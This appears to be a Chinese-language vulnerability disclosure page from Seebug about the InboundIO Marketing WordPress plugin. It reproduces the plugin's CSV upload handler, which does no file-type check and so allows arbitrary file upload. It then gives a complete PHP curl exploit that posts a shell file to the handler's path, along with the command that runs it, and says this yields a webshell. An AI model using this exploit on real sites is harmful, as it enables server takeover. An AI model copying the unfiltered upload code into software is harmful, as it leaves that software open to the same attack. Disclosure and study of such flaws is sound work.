<ul><li>/admin/partials/csv_uploader.php<br></li></ul><pre class=""><?php
$ds = DIRECTORY_SEPARATOR; //1
$storeFolder = 'uploaded_csv'; //2
if (!empty($_FILES)) {
$_FILES['file']['name'] = preg_replace('/[^A-Za-z0-9 _ .-]/', '', $_FILES['file']['name']);
$_FILES['file']['name'] = preg_replace('/\s+/', '_', $_FILES['file']['name']);
$tempFile = $_FILES['file']['tmp_name']; //3
$size = $_FILES['file']['size'];
$targetPath = dirname( __FILE__ ) . $ds. $storeFolder . $ds; //4
$targetFile = $targetPath. $_FILES['file']['name']; //5
move_uploaded_file($tempFile,$targetFile); //6
$path = "http://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
echo dirname($path)."/uploaded_csv/".$_FILES['file']['name']." ".$size;
}
?>
</pre><p>Csv_uploader.php没有做任何过滤,直接可以上传任意文件导致getshell。<br></p><p>利用payload:</p><pre class=""> <?php
$postData = array();
$postData[ 'file' ] = "@k3dz.php"; #Shell_2_Exec ;)
$dz = curl_init();
curl_setopt($dz, CURLOPT_URL, "http://[Target]/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php");
curl_setopt($dz, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($dz, CURLOPT_POST, 1);
curl_setopt($dz, CURLOPT_POSTFIELDS, $postData );
curl_setopt($dz, CURLOPT_TIMEOUT, 0);
$buf = curl_exec ($dz);
curl_close($dz);
unset($dz);
echo $buf;
?>
</pre><p>运行:</p><pre class="">php payload.php</pre><p>得到webshell。 </p><p> </p><p><img alt="1434003617401-83D13E86-AA58-4DE3-B54D-258BEC77E21F.png" src="https://images.seebug.org/@/uploads/1434392185703-1434003617401-83D13E86-AA58-4DE3-B54D-258BEC77E21F.png" data-image-size="836,49"><br></p>
京公网安备 11010502034610号
暂无评论